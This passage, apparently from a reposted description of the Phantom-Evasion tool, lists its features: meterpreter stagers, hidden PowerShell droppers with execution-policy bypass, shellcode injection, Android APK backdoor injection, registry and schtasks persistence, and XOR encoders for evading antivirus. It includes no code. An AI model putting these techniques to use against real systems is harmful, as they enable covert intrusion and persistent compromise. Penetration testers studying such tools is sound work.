, API loaded at runtime) C meterpreter/reverse_HTTPS VirtualAlloc (x86/x64): 32/64 bit windows/meterpreter/reverse_http polymorphic stager written in c (require multi/handler listener with payload set to windows/meterpreter/reverse_https (if x86) — windows/x64/meterpreter/reverse_https (if x64) , memory:Virtual) C meterpreter/reverse_HTTPS HeapAlloc (x86/x64): 32/64 bit windows/meterpreter/reverse_http polymorphic stager written in c (require multi/handler listener with payload set to windows/meterpreter/reverse_https (if x86) — windows/x64/meterpreter/reverse_https (if x64) , memory:Heap) C meterpreter/reverse_HTTPS VirtualAlloc NoDirectCall GPAGMH (x86/x64): 32/64 bit windows/meterpreter/reverse_http polymorphic stager written in c (require multi/handler listener with payload set to windows/meterpreter/reverse_https (if x86) — windows/x64/meterpreter/reverse_https (if x64) , API loaded at runtime) C meterpreter/reverse_HTTPS HeapAlloc NoDirectCall GPAGMH (x86/x64): 32/64 bit windows/meterpreter/reverse_http polymorphic stager written in c (require multi/handler listener with payload set to windows/meterpreter/reverse_https (if x86) — windows/x64/meterpreter/reverse_https (if x64) , memory:Heap , API loaded at runtime) Powershell / Wine-Pyinstaller modulesPowershell modules:(>) Randomized junkcode and windows antivirus evasion techniques (>) Decoy Process Spawner available (see phantom evasion decoy process spawner section) (>) Strip executable available (https://en.wikipedia.org/wiki/Strip_(Unix)) (>) Execution time range:35-60 secondWindows Powershell/Cmd Oneliner Dropper: Require user-supplied Powershell/Cmd oneliner payload (example Empire oneliner payload). Generate Windows powershell/Cmd oneliner dropper written in c. Powershell/Cmd oneliner payload is executed using system() function. Windows Powershell Script Dropper: Both msfvenom and custom powershell payloads supported. (32 bit powershell payloads are not compatible with 64 bit powershell target and vice versa.) Generate Windows powershell script (.ps1) dropper written in c. Powershell script payload is executed using system() function (powershell -executionpolicy bypass -WindowStyle Hidden -Noexit -File “PathTops1script"). Wine-Pyinstaller modules:(>) Randomized junkcode and windows antivirus evasion techniques (>) Execution time range:5-25 second (>) Require python and pyinstaller installed in wine.Windows WinePyinstaller Python MeterpreterPure python meterpreter payload.WinePyinstaller Oneline payload dropperPure python powershell/cmd oneliner dropper.Powershell/cmd payload executed using os.system().LINUX PAYLOADSLinux Shellcode Injection Module (C)Msfvenom linux payloads and custom shellcodes supported.(>) Randomized junkcode and C antivirus evasion techniques (>) Multibyte Xor encoders availables (see Multibyte Xor encoders readme section) (>) Strip executable available (https://en.wikipedia.org/wiki/Strip_(Unix)) (>) Execution time range:20-45 secondLinux Shellcode Injection HeapAlloc: Inject and Execute shellcode in memory using mmap and memcpy. Linux Bash Oneliner Dropper: Execute custom oneliner payload using system() function. OSX PAYLOADSOSX 32bit multi-encoded:Pure msfvenom multi-encoded OSX payloads.ANDROID PAYLOADSAndroid Msfvenom Apk smali/baksmali:(>) Fake loop injection (>) Goto loopAndroid msfvenom payloads modified an rebuilded with apktool (Also capable of apk backdoor injection).UNIVERSAL PAYLOADSGenerate executable compatible with the OSs used to run Phantom-Evasion.Universal Meterpreter increments-trick Universal Polymorphic Meterpreter Universal Polymorphic Oneliner dropper POST-EXPLOITATION MODULESWindows Persistence RegCreateKeyExW Add Registry Key (C) This modules generate executables which needs to be uploaded to the target machine and excuted specifing the fullpath to file to add to startup as arguments. Windows Persistence REG Add Registry Key (CMD) This module generate persistence cmdline payloads (Add Registry Key via REG.exe). Windows Persistence Keep Process Alive This module generate executable which need to be uploaded to the target machine and executed. Use CreateToolSnapshoot ProcessFirst and ProcessNext to check if specified process is alive every X seconds. Usefull combined with Persistence N.1 or N.2 (persistence start Keep process alive file which then start and keep alive the specified process) Windows Persistence Schtasks cmdline This modules generate persistence cmdline payloads (using Schtasks.exe).Windows Set Files Attribute Hiddenhide file through commandline or with compiled executable (SetFileAttributes API)WarningPYTHON3 COMPATIBILITY TEMPORARILY SUSPENDED!Decoy Processes Spawner:During target-side execution this will cause to spawn (Using WinExec or CreateProcess API) a maximum of 4 processes consequentialy. The last spawned process will reach the malicious section of code while the other decoy processes spawned before will executes only random junk code.PRO: Longer execution time,Lower rate of detection. CONS: Higher resource consumption.Multibyte Xor Encoder:C xor encoders with three pure c decoding stub available with Shellcode Injection modules.MultibyteKey xor:Shellcode xored with one multibyte (variable lenght) random key. Polymorphic C decoder stub.Double Multibyte-key xor:Shellcode xored with the result of xor between two multibyte (variable lenght) random keys Polymorphic C decoder stub.Triple Multibyte-key xor:Shellcode xored with the result of xor between two multibyte (variable lenght) random keys xored with a third multibyte random key. Polymorphic C decoder stub.Download Phantom-Evasion

Link: http://feedproxy.google.com/~r/PentestTools/~3/u2lYO11vEuc/phantom-evasion-python-av-evasion-tool.html